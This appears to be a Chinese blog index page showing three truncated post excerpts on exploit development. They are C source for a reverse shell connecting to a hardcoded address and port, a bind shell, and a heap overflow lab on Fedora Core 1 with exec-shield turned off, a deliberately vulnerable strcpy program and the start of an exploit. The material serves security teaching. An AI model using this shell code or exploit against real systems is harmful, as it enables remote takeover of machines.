摘要:
C代码#include //构造socket所需的库#include //定义sockaddr结构int main(){ char *shell[2]; //用于execv调用 int soc,remote; //文件描述符句柄 struct sockaddr_in serv_addr; //保存IP/端口值的结构 serv_addr.sin_addr.s_addr=0x6400A8C0; //将socket的地址设置为所有本地地址 serv_addr.sin_port=0xBBBB; //设置socket的端口48059 serv_addr.sin_f... 阅读全文
摘要:
示例C代码#include<sys/socket.h> //构造socket所需的库#include<netinet/in.h> //定义sockaddr结构int main(){ char *shell[2]; //用于execv调用 int server,client; //文件描述符句柄 struct sockaddr_in serv_addr; //保存IP/端口值的结构 server=socket(2,1,0); //建立一个本地IP socket,类型为stream(即tcp) serv_addr.sin_addr.s_addr=0; //将... 阅读全文
摘要:
实验平台:Fedora Core 1(glibc-2.3.2-101)实验前提:去掉该平台的堆执行保护:sysctl -w kernel.exec-shield=0目标漏洞代码:#//heap2.c#include<stdlib.h>#include<string.h>int main(int argc,char *argv[]){ char *buf1=malloc(300); char *buf2=malloc(20); strcpy(buf1,argv[1]); free(buf1); free(buf2); return(0);}exploit// heap e 阅读全文